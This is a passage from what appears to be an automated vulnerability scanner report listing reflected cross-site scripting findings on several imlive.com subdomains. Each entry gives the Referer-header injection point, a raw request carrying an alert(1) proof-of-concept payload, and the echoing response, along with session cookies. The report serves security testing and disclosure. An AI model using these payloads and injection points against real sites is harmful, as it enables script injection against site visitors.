Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /wmaster.ashx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=f9d2b'-alert(1)-'d37559930d9

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:46 GMT
Connection: close
Content-Length: 220620
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=f9d2b'-alert(1)-'d37559930d9&qs=cat=1^roomid=10&qs=cat=1^roomid=10&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.997. http://imlive.com/wmaster.ashx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/wmaster.ashx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a1e0b'><script>alert(1)</script>829092c5393 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /wmaster.ashx?WID=124669500825&LinkID=701&gotopage=homepagems3.asp&waron=yes&promocode=YZSUSA5583 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=a1e0b'><script>alert(1)</script>829092c5393

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:05:44 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyLRxWQc0aKAUPIcMr1z98%2F8hVk8Zl52g6XTc8ahIm5wd95g1OvMx5PgQr72%2BwfrefAKt0za8Ox5k7OXzxCV4gt%2F; path=/
Set-Cookie: prmntimlv=; expires=Sat, 03-May-2008 14:05:44 GMT; path=/
Set-Cookie: ASPSESSIONIDSAAQACTT=FIFIDFMACFGGBNHOPCCDFLHL; path=/
X-Powered-By: vsrv10
Date: Fri, 28 Jan 2011 14:05:43 GMT
Set-Cookie: BIGipServerImlive=2115241538.20480.0000; path=/
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10243

<html>
<head>

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/homepagems3.asp&lr=1107815990&ud=0&pe=homepagems3.asp&rf=http://www.google.com/search?hl=en^q=a1e0b'><script>alert(1)</script>829092c5393&sr=0&iy=dallas&id=44&iu=1' height='1' width='1'>
...[SNIP]...

4.998. http://in.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://in.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbbcb'-alert(1)-'3f0965cdc19 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=cbbcb'-alert(1)-'3f0965cdc19

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=od52s455aeusmw2ttl2jno55; path=/; HttpOnly
Set-Cookie: pin=; expires=Thu, 27-Jan-2011 14:24:37 GMT; path=/
Set-Cookie: ASP.NET_SessionId=od52s455aeusmw2ttl2jno55; path=/; HttpOnly
Set-Cookie: pin=; expires=Thu, 27-Jan-2011 14:24:37 GMT; path=/
Set-Cookie: spvdr=vd=94644a2b-b5a6-48ed-b0a3-514954c94902&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:37 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:36 GMT
Connection: close
Content-Length: 20976
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=in.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=cbbcb'-alert(1)-'3f0965cdc19&iy=dallas&id=44&iu=1&vd=94644a2b-b5a6-48ed-b0a3-514954c94902';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.999. http://in.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://in.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59e4e'-alert(1)-'86c82395764 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/ HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=59e4e'-alert(1)-'86c82395764

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=5nkv5m55ppg2vpflz1okbf45; path=/; HttpOnly
Set-Cookie: pin=; expires=Thu, 27-Jan-2011 14:24:46 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5nkv5m55ppg2vpflz1okbf45; path=/; HttpOnly
Set-Cookie: pin=; expires=Thu, 27-Jan-2011 14:24:46 GMT; path=/
Set-Cookie: spvdr=vd=3ba947dc-7aad-4c6e-8765-3c7be452a15c&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:46 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:46 GMT
Connection: close
Content-Length: 260428
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=in.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=59e4e'-alert(1)-'86c82395764&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=3ba947dc-7aad-4c6e-8765-3c7be452a15c';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1000. http://it.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a33e'-alert(1)-'3a6e8f04043 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5a33e'-alert(1)-'3a6e8f04043

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ovcnrd450rtssw55wufvjq45; path=/; HttpOnly
Set-Cookie: pit=; expires=Thu, 27-Jan-2011 14:24:52 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ovcnrd450rtssw55wufvjq45; path=/; HttpOnly
Set-Cookie: pit=; expires=Thu, 27-Jan-2011 14:24:52 GMT; path=/
Set-Cookie: spvdr=vd=d1360715-fb93-4254-aa31-8119266d4974&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:52 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:52 GMT
Connection: close
Content-Length: 18182
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=it.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=5a33e'-alert(1)-'3a6e8f04043&iy=dallas&id=44&iu=1&vd=d1360715-fb93-4254-aa31-8119266d4974';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1001. http://it.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://it.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60b0b'-alert(1)-'74ef2eb4a5d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=60b0b'-alert(1)-'74ef2eb4a5d

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=myqkgp452acf4lzi5u4hkwjd; path=/; HttpOnly
Set-Cookie: pit=; expires=Thu, 27-Jan-2011 14:25:07 GMT; path=/
Set-Cookie: ASP.NET_SessionId=myqkgp452acf4lzi5u4hkwjd; path=/; HttpOnly
Set-Cookie: pit=; expires=Thu, 27-Jan-2011 14:25:07 GMT; path=/
Set-Cookie: spvdr=vd=d2a2406f-0bd6-41db-8e90-2eb8d968ddf1&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:07 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:07 GMT
Connection: close
Content-Length: 20718
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/login.aspx&he=it.imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=60b0b'-alert(1)-'74ef2eb4a5d&iy=dallas&id=44&iu=1&vd=d2a2406f-0bd6-41db-8e90-2eb8d968ddf1';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1002. http://jp.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://jp.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3539e'-alert(1)-'9d756dfe67 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3539e'-alert(1)-'9d756dfe67

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=dxo1q555z104ijrh0grwy255; path=/; HttpOnly
Set-Cookie: pjp=; expires=Thu, 27-Jan-2011 14:25:05 GMT; path=/
Set-Cookie: ASP.NET_SessionId=dxo1q555z104ijrh0grwy255; path=/; HttpOnly
Set-Cookie: pjp=; expires=Thu, 27-Jan-2011 14:25:05 GMT; path=/
Set-Cookie: spvdr=vd=6cd394f6-d606-4c64-b829-a89aa950913a&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:05 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:04 GMT
Connection: close
Content-Length: 19156
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=jp.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=3539e'-alert(1)-'9d756dfe67&iy=dallas&id=44&iu=1&vd=6cd394f6-d606-4c64-b829-a89aa950913a';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1003. http://jp.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://jp.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c88b2'-alert(1)-'2a63c42b092 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/ HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c88b2'-alert(1)-'2a63c42b092

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=oepmbi550nrpuoqre0yxtl55; path=/; HttpOnly
Set-Cookie: pjp=; expires=Thu, 27-Jan-2011 14:25:14 GMT; path=/
Set-Cookie: ASP.NET_SessionId=oepmbi550nrpuoqre0yxtl55; path=/; HttpOnly
Set-Cookie: pjp=; expires=Thu, 27-Jan-2011 14:25:14 GMT; path=/
Set-Cookie: spvdr=vd=f2e25211-0621-46c6-829a-5ba89927f0bd&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:14 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:13 GMT
Connection: close
Content-Length: 237403
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=jp.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=c88b2'-alert(1)-'2a63c42b092&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=f2e25211-0621-46c6-829a-5ba89927f0bd';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1004. http://mx.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mx.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dd73'-alert(1)-'7a8d4483e55 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8dd73'-alert(1)-'7a8d4483e55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=e0di5ly4hulhx1ricawutjay; path=/; HttpOnly
Set-Cookie: pmx=; expires=Thu, 27-Jan-2011 14:25:19 GMT; path=/
Set-Cookie: ASP.NET_SessionId=e0di5ly4hulhx1ricawutjay; path=/; HttpOnly
Set-Cookie: pmx=; expires=Thu, 27-Jan-2011 14:25:19 GMT; path=/
Set-Cookie: spvdr=vd=78c765b8-58c9-4c8f-9d32-6bb2ed79e374&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:19 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:18 GMT
Connection: close
Content-Length: 18360
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=mx.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=8dd73'-alert(1)-'7a8d4483e55&iy=dallas&id=44&iu=1&vd=78c765b8-58c9-4c8f-9d32-6bb2ed79e374';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1005. http://mx.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mx.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71b4f'-alert(1)-'69efbaaf3ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/ HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=71b4f'-alert(1)-'69efbaaf3ed

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nqmym355qhamz4e4nwtenj55; path=/; HttpOnly
Set-Cookie: pmx=; expires=Thu, 27-Jan-2011 14:25:27 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nqmym355qhamz4e4nwtenj55; path=/; HttpOnly
Set-Cookie: pmx=; expires=Thu, 27-Jan-2011 14:25:27 GMT; path=/
